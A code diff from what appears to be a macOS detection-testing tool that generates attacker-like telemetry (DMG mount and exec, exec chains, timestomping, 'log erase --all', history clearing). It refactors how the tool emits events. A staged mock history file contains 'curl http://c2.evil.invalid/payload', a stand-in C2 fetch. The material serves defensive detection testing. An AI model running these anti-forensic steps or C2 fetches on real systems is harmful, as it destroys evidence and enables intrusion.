 		&mockGen{name: "mock_ok"},
 		&mockGen{name: "mock_fail", generateErr: errors.New("boom")},
 	}
-	err := runner.RunMany(context.Background(), gens, module.Params{}, func(module.TelemetryEvent) {}, runner.Options{})
+	err := runner.RunMany(context.Background(), gens, module.Params{}, discardEvent, runner.Options{})
 	if err == nil {
 		t.Error("expected combined error")
 	}
@@ -269,7 +339,7 @@ func TestRunSingleCleansUpOnCancel(t *testing.T) {
 	}()
 	defer cancel()
 
-	err := runner.RunSingle(ctx, gen, module.Params{}, func(module.TelemetryEvent) {}, runner.Options{})
+	err := runner.RunSingle(ctx, gen, module.Params{}, discardEvent, runner.Options{})
 	if !errors.Is(err, context.Canceled) {
 		t.Errorf("expected context.Canceled, got %v", err)
 	}
@@ -343,7 +413,7 @@ func TestRunScenarioStopsOnCancel(t *testing.T) {
 			})
 
 			path := writeScenario(t, name, 4, tc.onError)
-			err := runner.RunScenario(ctx, path, func(module.TelemetryEvent) {}, runner.Options{Registry: &registry})
+			err := runner.RunScenario(ctx, path, discardEvent, runner.Options{Registry: &registry})
 			if !errors.Is(err, context.Canceled) {
 				t.Errorf("expected context.Canceled, got %v", err)
 			}
@@ -373,7 +443,7 @@ func TestRunScenarioAuditsInterrupt(t *testing.T) {
 	}
 
 	path := writeScenario(t, name, 5, "")
-	runErr := runner.RunScenario(ctx, path, func(module.TelemetryEvent) {}, runner.Options{
+	runErr := runner.RunScenario(ctx, path, discardEvent, runner.Options{
 		Registry: &registry,
 		AuditLog: logger,
 	})
@@ -438,11 +508,11 @@ func TestRunSingle_RunIDInContext(t *testing.T) {
 	gen := &ctxCapturingGen{
 		mockGen: mockGen{
 			name:   "ctx_test",
-			events: []module.TelemetryEvent{{Success: true, Category: "test", EventType: "test"}},
+			events: []module.TelemetryEvent{{Outcome: module.OutcomeExecuted, Subject: module.Resource("test", "event", ""), Category: "test", EventType: "test"}},
 		},
 	}
 
-	emit := func(module.TelemetryEvent) {}
+	emit := discardEvent
 	opts := runner.Options{RunID: "test_run_id_1234"}
 	if err := runner.RunSingle(context.Background(), gen, module.Params{}, emit, opts); err != nil {
 		t.Fatal(err)
@@ -495,7 +565,7 @@ func TestRunScenarioCategoryHonorsOnErrorPerInvocation(t *testing.T) {
 				t.Fatal(err)
 			}
 
-			err := runner.RunScenario(context.Background(), path, func(module.TelemetryEvent) {}, runner.Options{Registry: &registry})
+			err := runner.RunScenario(context.Background(), path, discardEvent, runner.Options{Registry: &registry})
 			if err == nil {
 				t.Fatal("expected scenario failure")
 			}
@@ -544,7 +614,7 @@ func TestRunScenarioNormalizesPathList(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	if err := runner.RunScenario(context.Background(), path, func(module.TelemetryEvent) {}, runner.Options{Registry: &registry}); err != nil {
+	if err := runner.RunScenario(context.Background(), path, discardEvent, runner.Options{Registry: &registry}); err != nil {
 		t.Fatal(err)
 	}
 	if got := invocation.params.Paths("paths", nil); !reflect.DeepEqual(got, []string{"/tmp/one", "/tmp/two"}) {
@@ -570,7 +640,7 @@ func TestRunScenarioRejectsUnknownParamBeforeExecution(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	err := runner.RunScenario(context.Background(), path, func(module.TelemetryEvent) {}, runner.Options{Registry: &registry})
+	err := runner.RunScenario(context.Background(), path, discardEvent, runner.Options{Registry: &registry})
 	if err == nil || invocation.generateCalls != 0 || invocation.cleanedUp {
 		t.Fatalf("RunScenario error = %v, invocation = %+v", err, invocation)
 	}

--- a/modules/endpoint_security/es_file.go
+++ b/modules/endpoint_security/es_file.go
@@ -5,6 +5,7 @@ package endpointsecurity
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"io"
 	"os"
@@ -54,57 +55,70 @@ func (e *esFile) Generate(ctx context.Context, params module.Params, emit module
 	targetPath := filepath.Join(workDir, "es_notify_create.txt")
 	e.createdPath = targetPath
 
-	createEv := output.NewEvent(info, "es_notify_create", false, fmt.Sprintf("creating %s (triggers ES_EVENT_TYPE_NOTIFY_CREATE)", targetPath))
+	createEv := output.NewEvent(info, "es_notify_create", module.OutcomeError, module.File(targetPath), fmt.Sprintf("creating %s (triggers ES_EVENT_TYPE_NOTIFY_CREATE)", targetPath))
 	if err := os.WriteFile(targetPath, []byte("es_create\n"), 0o644); err != nil {
 		createEv = output.WithError(createEv, err)
-		emit(createEv)
-		return err
+		return errors.Join(err, emit(createEv))
 	}
-	createEv.Success = true
+	createEv.Outcome = module.OutcomeExecuted
 	createEv.Message = fmt.Sprintf("created %s (ES_EVENT_TYPE_NOTIFY_CREATE)", targetPath)
 	createEv = output.WithDetails(createEv, map[string]any{"path": targetPath, "es_event": "ES_EVENT_TYPE_NOTIFY_CREATE"})
-	emit(createEv)
+	if err := emit(createEv); err != nil {
+		return err
+	}
 
 	// Opening for read is a distinct ES event from the write below, which opens
 	// for append. NOTIFY_OPEN already fires incidentally from the credential
 	// modules, but this is the module an operator runs to exercise ES file
 	// coverage, so it names the event rather than leaving it implicit.
-	openEv := output.NewEvent(info, "es_notify_open", false, fmt.Sprintf("opening %s (triggers ES_EVENT_TYPE_NOTIFY_OPEN)", targetPath))
+	openEv := output.NewEvent(info, "es_notify_open", module.OutcomeError, module.File(targetPath), fmt.Sprintf("opening %s (triggers ES_EVENT_TYPE_NOTIFY_OPEN)", targetPath))
 	if rf, err := os.Open(targetPath); err != nil {
 		openEv = output.WithError(openEv, err)
-		emit(openEv)
+		if emitErr := emit(openEv); emitErr != nil {
+			return emitErr
+		}
 	} else {
 		n, _ := io.Copy(io.Discard, rf)
 		_ = rf.Close()
-		openEv.Success = true
+		openEv.Outcome = module.OutcomeExecuted
 		openEv.Message = fmt.Sprintf("opened %s (ES_EVENT_TYPE_NOTIFY_OPEN)", targetPath)
 		openEv = output.WithDetails(openEv, map[string]any{"path": targetPath, "es_event": "ES_EVENT_TYPE_NOTIFY_OPEN", "bytes_read": n})
-		emit(openEv)
+		if err := emit(openEv); err != nil {
+			return err
+		}
 	}
 
-	writeEv := output.NewEvent(info, "es_notify_write", false, fmt.Sprintf("writing %s (triggers ES_EVENT_TYPE_NOTIFY_WRITE)", targetPath))
+	writeEv := output.NewEvent(info, "es_notify_write", module.OutcomeError, module.File(targetPath), fmt.Sprintf("writing %s (triggers ES_EVENT_TYPE_NOTIFY_WRITE)", targetPath))
 	f, err := os.OpenFile(targetPath, os.O_APPEND|os.O_WRONLY, 0o644)
 	if err != nil {
 		writeEv = output.WithError(writeEv, err)
-		emit(writeEv)
+		if emitErr := emit(writeEv); emitErr != nil {
+			return emitErr
+		}
 	} else {
 		f.WriteString("es_write\n") //nolint:errcheck
 		_ = f.Close()
-		writeEv.Success = true
+		writeEv.Outcome = module.OutcomeExecuted
 		writeEv.Message = fmt.Sprintf("wrote to %s (ES_EVENT_TYPE_NOTIFY_WRITE)", targetPath)
 		writeEv = output.WithDetails(writeEv, map[string]any{"path": targetPath, "es_event": "ES_EVENT_TYPE_NOTIFY_WRITE"})
-		emit(writeEv)
+		if err := emit(writeEv); err != nil {
+			return err
+		}
 	}
 
-	setmodeEv := output.NewEvent(info, "es_notify_setmode", false, fmt.Sprintf("chmod %s (triggers ES_EVENT_TYPE_NOTIFY_SETMODE)", targetPath))
+	setmodeEv := output.NewEvent(info, "es_notify_setmode", module.OutcomeError, module.File(targetPath), fmt.Sprintf("chmod %s (triggers ES_EVENT_TYPE_NOTIFY_SETMODE)", targetPath))
 	if err := os.Chmod(targetPath, 0o600); err != nil {
 		setmodeEv = output.WithError(setmodeEv, err)
-		emit(setmodeEv)
+		if emitErr := emit(setmodeEv); emitErr != nil {
+			return emitErr
+		}
 	} else {
-		setmodeEv.Success = true
+		setmodeEv.Outcome = module.OutcomeExecuted
 		setmodeEv.Message = fmt.Sprintf("chmod 0600 on %s (ES_EVENT_TYPE_NOTIFY_SETMODE)", targetPath)
 		setmodeEv = output.WithDetails(setmodeEv, map[string]any{"path": targetPath, "es_event": "ES_EVENT_TYPE_NOTIFY_SETMODE", "mode": "0600"})
-		emit(setmodeEv)
+		if err := emit(setmodeEv); err != nil {
+			return err
+		}
 	}
 
 	// Rename moves the target, so the tracked path has to follow it or an
@@ -112,29 +126,37 @@ func (e *esFile) Generate(ctx context.Context, params module.Params, emit module
 	// for the original name.
 	renamedPath := filepath.Join(workDir, "es_notify_rename.txt")
 	previousPath := targetPath
-	renameEv := output.NewEvent(info, "es_notify_rename", false, fmt.Sprintf("renaming %s (triggers ES_EVENT_TYPE_NOTIFY_RENAME)", targetPath))
+	renameEv := output.NewEvent(info, "es_notify_rename", module.OutcomeError, module.File(renamedPath), fmt.Sprintf("renaming %s (triggers ES_EVENT_TYPE_NOTIFY_RENAME)", targetPath))
 	if err := os.Rename(targetPath, renamedPath); err != nil {
 		renameEv = output.WithError(renameEv, err)
-		emit(renameEv)
+		if emitErr := emit(renameEv); emitErr != nil {
+			return emitErr
+		}
 	} else {
 		targetPath = renamedPath
 		e.createdPath = renamedPath
-		renameEv.Success = true
+		renameEv.Outcome = module.OutcomeExecuted
 		renameEv.Message = fmt.Sprintf("renamed to %s (ES_EVENT_TYPE_NOTIFY_RENAME)", renamedPath)
 		renameEv = output.WithDetails(renameEv, map[string]any{"path": renamedPath, "es_event": "ES_EVENT_TYPE_NOTIFY_RENAME", "previous_path": previousPath})
-		emit(renameEv)
+		if err := emit(renameEv); err != nil {
+			return err
+		}
 	}
 
-	unlinkEv := output.NewEvent(info, "es_notify_unlink", false, fmt.Sprintf("deleting %s (triggers ES_EVENT_TYPE_NOTIFY_UNLINK)", targetPath))
+	unlinkEv := output.NewEvent(info, "es_notify_unlink", module.OutcomeError, module.File(targetPath), fmt.Sprintf("deleting %s (triggers ES_EVENT_TYPE_NOTIFY_UNLINK)", targetPath))
 	if err := os.Remove(targetPath); err != nil {
 		unlinkEv = output.WithError(unlinkEv, err)
-		emit(unlinkEv)
+		if emitErr := emit(unlinkEv); emitErr != nil {
+			return emitErr
+		}
 	} else {
 		e.createdPath = ""
-		unlinkEv.Success = true
+		unlinkEv.Outcome = module.OutcomeExecuted
 		unlinkEv.Message = fmt.Sprintf("deleted %s (ES_EVENT_TYPE_NOTIFY_UNLINK)", targetPath)
 		unlinkEv = output.WithDetails(unlinkEv, map[string]any{"path": targetPath, "es_event": "ES_EVENT_TYPE_NOTIFY_UNLINK"})
-		emit(unlinkEv)
+		if err := emit(unlinkEv); err != nil {
+			return err
+		}
 	}
 
 	return nil

--- a/modules/endpoint_security/es_file_test.go
+++ b/modules/endpoint_security/es_file_test.go
@@ -15,7 +15,7 @@ func TestESFile_GenerateEmitsFullFileEventCycle(t *testing.T) {
 	workDir := filepath.Join(t.TempDir(), "es")
 	e := &esFile{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 
 	if err := e.Generate(context.Background(), module.Params{"work_dir": workDir}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -40,7 +40,7 @@ func TestESFile_GenerateEmitsFullFileEventCycle(t *testing.T) {
 		if events[i].EventType != evType {
 			t.Errorf("event[%d] = %q, want %q", i, events[i].EventType, evType)
 		}
-		if !events[i].Success {
+		if events[i].Outcome != module.OutcomeExecuted {
 			t.Errorf("event %q did not succeed: %s", evType, events[i].Error)
 		}
 	}
@@ -84,7 +84,7 @@ func TestESFile_CleanupRemovesTrackedRenamedPath(t *testing.T) {
 func TestESFile_CleanupAfterSuccessfulUnlinkIsNoOp(t *testing.T) {
 	workDir := filepath.Join(t.TempDir(), "es")
 	e := &esFile{}
-	emit := func(module.TelemetryEvent) {}
+	emit := func(module.TelemetryEvent) error { return nil }
 
 	if err := e.Generate(context.Background(), module.Params{"work_dir": workDir}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)

--- a/modules/endpoint_security/es_mount.go
+++ b/modules/endpoint_security/es_mount.go
@@ -117,23 +117,23 @@ func (e *esMount) Generate(ctx context.Context, params module.Params, emit modul
 	}
 	dmgPath := path.Join(workDir, "macnoise_delivery.dmg")
 
-	createEv := output.NewEvent(info, "es_dmg_create", false, fmt.Sprintf("building disk image %s", dmgPath))
+	createEv := output.NewEvent(info, "es_dmg_create", module.OutcomeError, module.File(dmgPath), fmt.Sprintf("building disk image %s", dmgPath))
 	if out, err := exec.CommandContext(ctx, "hdiutil", createArgs(dmgPath)...).CombinedOutput(); err != nil {
 		createEv = output.WithError(createEv, fmt.Errorf("%v: %s", err, strings.TrimSpace(string(out))))
-		emit(createEv)
-		return fmt.Errorf("es_mount: hdiutil create: %w", err)
+		return errors.Join(fmt.Errorf("es_mount: hdiutil create: %w", err), emit(createEv))
 	}
 	e.dmgPath = dmgPath
-	createEv.Success = true
+	createEv.Outcome = module.OutcomeExecuted
 	createEv.Message = fmt.Sprintf("built disk image %s", dmgPath)
-	emit(output.WithDetails(createEv, map[string]any{"path": dmgPath, "volume_name": volumeName}))
+	if err := emit(output.WithDetails(createEv, map[string]any{"path": dmgPath, "volume_name": volumeName})); err != nil {
+		return err
+	}
 
-	mountEv := output.NewEvent(info, "es_notify_mount", false, fmt.Sprintf("mounting %s (triggers ES_EVENT_TYPE_NOTIFY_MOUNT)", dmgPath))
+	mountEv := output.NewEvent(info, "es_notify_mount", module.OutcomeError, module.File(dmgPath), fmt.Sprintf("mounting %s (triggers ES_EVENT_TYPE_NOTIFY_MOUNT)", dmgPath))
 	attachOut, err := exec.CommandContext(ctx, "hdiutil", attachArgs(dmgPath)...).CombinedOutput()
 	if err != nil {
 		mountEv = output.WithError(mountEv, fmt.Errorf("%v: %s", err, strings.TrimSpace(string(attachOut))))
-		emit(mountEv)
-		return fmt.Errorf("es_mount: hdiutil attach: %w", err)
+		return errors.Join(fmt.Errorf("es_mount: hdiutil attach: %w", err), emit(mountEv))
 	}
 	res := parseAttachOutput(string(attachOut))
 	e.device, e.mountPoint = res.Device, res.MountPoint
@@ -150,39 +150,39 @@ func (e *esMount) Generate(ctx context.Context, params module.Params, emit modul
 		// here would be asserting telemetry that was never produced.
 		mountEv.Message = fmt.Sprintf("attached %s but no volume was mounted", dmgPath)
 		mountEv = output.WithOutcome(mountEv, module.OutcomeIndeterminate, nil)
-		emit(output.WithDetails(mountEv, mountDetails))
-		return nil
+		return emit(output.WithDetails(mountEv, mountDetails))
 	}
-	mountEv.Success = true
+	mountEv.Outcome = module.OutcomeExecuted
 	mountEv.Message = fmt.Sprintf("mounted %s at %s (ES_EVENT_TYPE_NOTIFY_MOUNT)", dmgPath, res.MountPoint)
-	emit(output.WithDetails(mountEv, mountDetails))
+	if err := emit(output.WithDetails(mountEv, mountDetails)); err != nil {
+		return err
+	}
 
-	e.emitVolumeExec(ctx, info, emit, runID)
+	if err := e.emitVolumeExec(ctx, info, emit, runID); err != nil {
+		return err
+	}
 
-	unmountEv := output.NewEvent(info, "es_notify_unmount", false, fmt.Sprintf("unmounting %s (triggers ES_EVENT_TYPE_NOTIFY_UNMOUNT)", res.MountPoint))
+	unmountEv := output.NewEvent(info, "es_notify_unmount", module.OutcomeError, module.File(res.MountPoint), fmt.Sprintf("unmounting %s (triggers ES_EVENT_TYPE_NOTIFY_UNMOUNT)", res.MountPoint))
 	if out, err := exec.CommandContext(ctx, "hdiutil", detachArgs(res.MountPoint)...).CombinedOutput(); err != nil {
 		unmountEv = output.WithError(unmountEv, fmt.Errorf("%v: %s", err, strings.TrimSpace(string(out))))
-		emit(unmountEv)
-		return nil
+		return emit(unmountEv)
 	}
 	e.mountPoint, e.device = "", ""
-	unmountEv.Success = true
+	unmountEv.Outcome = module.OutcomeExecuted
 	unmountEv.Message = fmt.Sprintf("unmounted %s (ES_EVENT_TYPE_NOTIFY_UNMOUNT)", res.MountPoint)
-	emit(output.WithDetails(unmountEv, map[string]any{
+	return emit(output.WithDetails(unmountEv, map[string]any{
 		"mount_point": res.MountPoint,
 		"es_event":    "ES_EVENT_TYPE_NOTIFY_UNMOUNT",
 	}))
-
-	return nil
 }
 
 // emitVolumeExec writes a payload into the mounted volume and runs it. This is
 // the half that makes T1204.002 accurate: a bare mount is weak signal, while a
 // process launched from a /Volumes path is what AMOS-style delivery actually
 // looks like on an endpoint.
-func (e *esMount) emitVolumeExec(ctx context.Context, info module.ModuleInfo, emit module.EventEmitter, runID string) {
+func (e *esMount) emitVolumeExec(ctx context.Context, info module.ModuleInfo, emit module.EventEmitter, runID string) error {
 	payload := path.Join(e.mountPoint, payloadName)
-	ev := output.NewEvent(info, "es_volume_exec", false, fmt.Sprintf("executing %s (triggers ES_EVENT_TYPE_NOTIFY_EXEC)", payload))
+	ev := output.NewEvent(info, "es_volume_exec", module.OutcomeError, module.Process(path.Base(payload), payload, payload, 0), fmt.Sprintf("executing %s (triggers ES_EVENT_TYPE_NOTIFY_EXEC)", payload))
 	details := map[string]any{"payload": payload, "mount_point": e.mountPoint, "es_event": "ES_EVENT_TYPE_NOTIFY_EXEC"}
 
 	echoArg := "macnoise_dmg_payload"
@@ -192,8 +192,7 @@ func (e *esMount) emitVolumeExec(ctx context.Context, info module.ModuleInfo, em
 	script := "#!/bin/sh\necho " + echoArg + "\n"
 	if err := os.WriteFile(payload, []byte(script), 0o755); err != nil {
 		ev = output.WithError(ev, err)
-		emit(output.WithDetails(ev, details))
-		return
+		return emit(output.WithDetails(ev, details))
 	}
 
 	out, err := exec.CommandContext(ctx, payload).CombinedOutput()
@@ -203,14 +202,13 @@ func (e *esMount) emitVolumeExec(ctx context.Context, info module.ModuleInfo, em
 		// because it means no EXEC event was generated to detect on.
 		ev.Message = fmt.Sprintf("%s could not be executed from the mounted volume", payload)
 		ev = output.WithOutcome(ev, module.OutcomeDenied, fmt.Errorf("%v: %s", err, strings.TrimSpace(string(out))))
-		emit(output.WithDetails(ev, details))
-		return
+		return emit(output.WithDetails(ev, details))
 	}
 
-	ev.Success = true
+	ev.Outcome = module.OutcomeExecuted
 	ev.Message = fmt.Sprintf("executed %s from mounted volume (ES_EVENT_TYPE_NOTIFY_EXEC)", payload)
 	details["stdout"] = strings.TrimSpace(string(out))
-	emit(output.WithDetails(ev, details))
+	return emit(output.WithDetails(ev, details))
 }
 
 func (e *esMount) DryRun(params module.Params) []string {

--- a/modules/endpoint_security/es_mount_integration_test.go
+++ b/modules/endpoint_security/es_mount_integration_test.go
@@ -17,7 +17,7 @@ func runMount(t *testing.T, e *esMount, workDir string) []module.TelemetryEvent 
 	t.Helper()
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 
 	// Registered before Generate so a panic or an assertion failure part-way
 	// through still detaches the image, rather than leaving a mounted volume
@@ -42,7 +42,7 @@ func TestESMount_GenerateEmitsFullMountExecUnmountCycle(t *testing.T) {
 		if events[i].EventType != evType {
 			t.Fatalf("event[%d] = %q, want %q", i, events[i].EventType, evType)
 		}
-		if !events[i].Success {
+		if events[i].Outcome != module.OutcomeExecuted {
 			t.Errorf("event %q did not succeed: %s", evType, events[i].Error)
 		}
 	}

--- a/modules/endpoint_security/es_process.go
+++ b/modules/endpoint_security/es_process.go
@@ -2,6 +2,7 @@ package endpointsecurity
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os/exec"
 
@@ -63,7 +64,8 @@ func (e *esProcess) Generate(ctx context.Context, params module.Params, emit mod
 
 	info := e.Info()
 
-	ev := output.NewEvent(info, "es_exec_chain", false,
+	ev := output.NewEvent(info, "es_exec_chain", module.OutcomeError,
+		module.Process("sh", "/bin/sh", "nested sh exec chain", 0),
 		fmt.Sprintf("executing %d-deep process fork/exec chain", depth))
 
 	chainArgs := buildExecChainArgs(depth, module.RunIDFromContext(ctx))
@@ -71,18 +73,16 @@ func (e *esProcess) Generate(ctx context.Context, params module.Params, emit mod
 	out, err := cmd.CombinedOutput()
 	if err != nil {
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
-	ev.Success = true
+	ev.Outcome = module.OutcomeExecuted
 	ev.Message = fmt.Sprintf("%d-deep exec chain completed (ES_EVENT_TYPE_NOTIFY_EXEC/FORK/EXIT)", depth)
 	ev = output.WithDetails(ev, map[string]any{
 		"chain_depth": depth,
 		"output":      string(out),
 		"es_events":   []string{"ES_EVENT_TYPE_NOTIFY_EXEC", "ES_EVENT_TYPE_NOTIFY_FORK", "ES_EVENT_TYPE_NOTIFY_EXIT"},
 	})
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (e *esProcess) DryRun(params module.Params) []string {

--- a/modules/endpoint_security/es_process_exec_test.go
+++ b/modules/endpoint_security/es_process_exec_test.go
@@ -67,8 +67,9 @@ func TestESProcessGenerate_Chains(t *testing.T) {
 			ctx = module.ContextWithRunID(ctx, tt.runID)
 			var events []module.TelemetryEvent
 			p := &esProcess{}
-			if err := p.Generate(ctx, module.Params{"chain_depth": tt.depth}, func(ev module.TelemetryEvent) {
+			if err := p.Generate(ctx, module.Params{"chain_depth": tt.depth}, func(ev module.TelemetryEvent) error {
 				events = append(events, ev)
+				return nil
 			}); err != nil {
 				t.Fatalf("Generate: %v", err)
 			}
@@ -76,7 +77,7 @@ func TestESProcessGenerate_Chains(t *testing.T) {
 				t.Fatalf("events = %+v, want one", events)
 			}
 			ev := events[0]
-			if ev.Module != "es_process" || ev.EventType != "es_exec_chain" || !ev.Success || ev.Error != "" || ev.ResolvedOutcome() != module.OutcomeExecuted {
+			if ev.Module != "es_process" || ev.EventType != "es_exec_chain" || ev.Error != "" || ev.Outcome != module.OutcomeExecuted {
 				t.Errorf("unexpected event: %+v", ev)
 			}
 			wantOutput := "es_exit"
@@ -100,13 +101,14 @@ func TestESProcessGenerate_Chains(t *testing.T) {
 func TestESProcessGenerate_MissingShell(t *testing.T) {
 	t.Setenv("PATH", t.TempDir())
 	var events []module.TelemetryEvent
-	err := (&esProcess{}).Generate(context.Background(), nil, func(ev module.TelemetryEvent) {
+	err := (&esProcess{}).Generate(context.Background(), nil, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
+		return nil
 	})
 	if !errors.Is(err, exec.ErrNotFound) {
 		t.Fatalf("Generate = %v, want missing executable", err)
 	}
-	if len(events) != 1 || events[0].Success || events[0].Error != err.Error() || events[0].ResolvedOutcome() != module.OutcomeError {
+	if len(events) != 1 || events[0].Error != err.Error() || events[0].Outcome != module.OutcomeError {
 		t.Fatalf("expected one failed event: %+v", events)
 	}
 }
@@ -115,13 +117,14 @@ func TestESProcessGenerate_CanceledBeforeExecution(t *testing.T) {
 	ctx, cancel := context.WithCancel(context.Background())
 	cancel()
 	var events []module.TelemetryEvent
-	err := (&esProcess{}).Generate(ctx, nil, func(ev module.TelemetryEvent) {
+	err := (&esProcess{}).Generate(ctx, nil, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
+		return nil
 	})
 	if !errors.Is(err, context.Canceled) {
 		t.Fatalf("Generate = %v, want context.Canceled", err)
 	}
-	if len(events) != 1 || events[0].Success || events[0].Error != err.Error() || events[0].ResolvedOutcome() != module.OutcomeError {
+	if len(events) != 1 || events[0].Error != err.Error() || events[0].Outcome != module.OutcomeError {
 		t.Fatalf("expected one canceled event: %+v", events)
 	}
 }

--- a/modules/evasion/log_clear.go
+++ b/modules/evasion/log_clear.go
@@ -55,7 +55,7 @@ func (e *evadeLogClear) CheckPrereqs(ctx context.Context, params module.Params) 
 // and is cross-platform testable unlike touch -t.
 func timestomp(info module.ModuleInfo, target string) module.TelemetryEvent {
 	if err := os.WriteFile(target, []byte("macnoise timestomp target\n"), 0o644); err != nil {
-		ev := output.NewEvent(info, "file_timestomp", false,
+		ev := output.NewEvent(info, "file_timestomp", module.OutcomeError, module.File(target),
 			fmt.Sprintf("failed to create timestomp target: %s", target))
 		return output.WithError(ev, err)
 	}
@@ -63,7 +63,7 @@ func timestomp(info module.ModuleInfo, target string) module.TelemetryEvent {
 	past := time.Date(2000, 1, 1, 0, 0, 0, 0, time.UTC)
 	err := os.Chtimes(target, past, past)
 	if err != nil {
-		ev := output.NewEvent(info, "file_timestomp", true,
+		ev := output.NewEvent(info, "file_timestomp", module.OutcomeDenied, module.File(target),
 			fmt.Sprintf("timestomp denied: %s", target))
 		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 		return output.WithDetails(ev, map[string]any{
@@ -73,7 +73,7 @@ func timestomp(info module.ModuleInfo, target string) module.TelemetryEvent {
 		})
 	}
 
-	ev := output.NewEvent(info, "file_timestomp", true,
+	ev := output.NewEvent(info, "file_timestomp", module.OutcomeExecuted, module.File(target),
 		fmt.Sprintf("timestomped %s to %s", target, past.Format("2006-01-02")))
 	return output.WithDetails(ev, map[string]any{
 		"path":         target,
@@ -87,7 +87,8 @@ func timestomp(info module.ModuleInfo, target string) module.TelemetryEvent {
 func logErase(ctx context.Context, info module.ModuleInfo) module.TelemetryEvent {
 	out, err := exec.CommandContext(ctx, "log", "erase", "--all").CombinedOutput()
 	if err != nil {
-		ev := output.NewEvent(info, "log_erase_attempt", true,
+		ev := output.NewEvent(info, "log_erase_attempt", module.OutcomeDenied,
+			module.Process("log", "/usr/bin/log", "log erase --all", 0),
 			"log erase --all denied (expected without root)")
 		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 		return output.WithDetails(ev, map[string]any{
@@ -97,7 +98,8 @@ func logErase(ctx context.Context, info module.ModuleInfo) module.TelemetryEvent
 		})
 	}
 
-	ev := output.NewEvent(info, "log_erase_attempt", true,
+	ev := output.NewEvent(info, "log_erase_attempt", module.OutcomeExecuted,
+		module.Process("log", "/usr/bin/log", "log erase --all", 0),
 		"log erase --all succeeded")
 	return output.WithDetails(ev, map[string]any{
 		"command":   "log erase --all",
@@ -112,14 +114,14 @@ func logErase(ctx context.Context, info module.ModuleInfo) module.TelemetryEvent
 func clearHistory(info module.ModuleInfo, stageDir string) module.TelemetryEvent {
 	histFile := filepath.Join(stageDir, ".zsh_history")
 	if err := os.WriteFile(histFile, []byte("echo secret-command\ncurl http://c2.evil.invalid/payload\n"), 0o600); err != nil {
-		ev := output.NewEvent(info, "history_clear", false,
+		ev := output.NewEvent(info, "history_clear", module.OutcomeError, module.File(histFile),
 			fmt.Sprintf("failed to create mock history: %s", histFile))
 		return output.WithError(ev, err)
 	}
 
 	err := os.Remove(histFile)
 	if err != nil {
-		ev := output.NewEvent(info, "history_clear", true,
+		ev := output.NewEvent(info, "history_clear", module.OutcomeDenied, module.File(histFile),
 			fmt.Sprintf("mock history removal denied: %s", histFile))
 		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 		return output.WithDetails(ev, map[string]any{
@@ -128,7 +130,7 @@ func clearHistory(info module.ModuleInfo, stageDir string) module.TelemetryEvent
 		})
 	}
 
-	ev := output.NewEvent(info, "history_clear", true,
+	ev := output.NewEvent(info, "history_clear", module.OutcomeExecuted, module.File(histFile),
 		fmt.Sprintf("mock history cleared: %s", histFile))
 	return output.WithDetails(ev, map[string]any{
 		"path":      histFile,
@@ -149,23 +151,25 @@ func (e *evadeLogClear) Generate(ctx context.Context, params module.Params, emit
 		return ctx.Err()
 	default:
 	}
-	emit(timestomp(info, filepath.Join(stageDir, "timestomp_target")))
+	if err := emit(timestomp(info, filepath.Join(stageDir, "timestomp_target"))); err != nil {
+		return err
+	}
 
 	select {
 	case <-ctx.Done():
 		return ctx.Err()
 	default:
 	}
-	emit(logErase(ctx, info))
+	if err := emit(logErase(ctx, info)); err != nil {
+		return err
+	}
 
 	select {
 	case <-ctx.Done():
 		return ctx.Err()
 	default:
 	}
-	emit(clearHistory(info, stageDir))
-
-	return nil
+	return emit(clearHistory(info, stageDir))
 }
 
 func (e *evadeLogClear) DryRun(params module.Params) []string {

--- a/modules/evasion/log_clear_exec_test.go
+++ b/modules/evasion/log_clear_exec_test.go
@@ -26,7 +26,7 @@ func TestLogClearGenerate_RealExecution(t *testing.T) {
 	ctx = module.ContextWithRunID(ctx, "execution")
 	g := &evadeLogClear{}
 	var events []module.TelemetryEvent
-	err := g.Generate(ctx, module.Params{"stage_dir": base}, func(ev module.TelemetryEvent) {
+	err := g.Generate(ctx, module.Params{"stage_dir": base}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
 		if ev.EventType == "file_timestomp" {
 			stat, err := os.Stat(filepath.Join(stage, "timestomp_target"))
@@ -37,6 +37,7 @@ func TestLogClearGenerate_RealExecution(t *testing.T) {
 				t.Errorf("mtime = %v, want %v", stat.ModTime(), want)
 			}
 		}
+		return nil
 	})
 	if err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -45,11 +46,11 @@ func TestLogClearGenerate_RealExecution(t *testing.T) {
 		t.Fatalf("events = %+v, want three operations", events)
 	}
 	for i, kind := range []string{"file_timestomp", "log_erase_attempt", "history_clear"} {
-		if events[i].EventType != kind || !events[i].Success {
+		if events[i].EventType != kind || events[i].Outcome == module.OutcomeError {
 			t.Errorf("event %d = %+v", i, events[i])
 		}
 	}
-	if events[1].ResolvedOutcome() != module.OutcomeDenied || events[1].Error == "" {
+	if events[1].Outcome != module.OutcomeDenied || events[1].Error == "" {
 		t.Errorf("log erase = %+v, want denied", events[1])
 	}
 	out, _ := events[1].Details["output"].(string)
@@ -79,9 +80,10 @@ func TestLogClearGenerate_CancelBetweenOperations(t *testing.T) {
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
 	var events []module.TelemetryEvent
-	err := g.Generate(ctx, module.Params{"stage_dir": stage}, func(ev module.TelemetryEvent) {
+	err := g.Generate(ctx, module.Params{"stage_dir": stage}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
 		cancel()
+		return nil
 	})
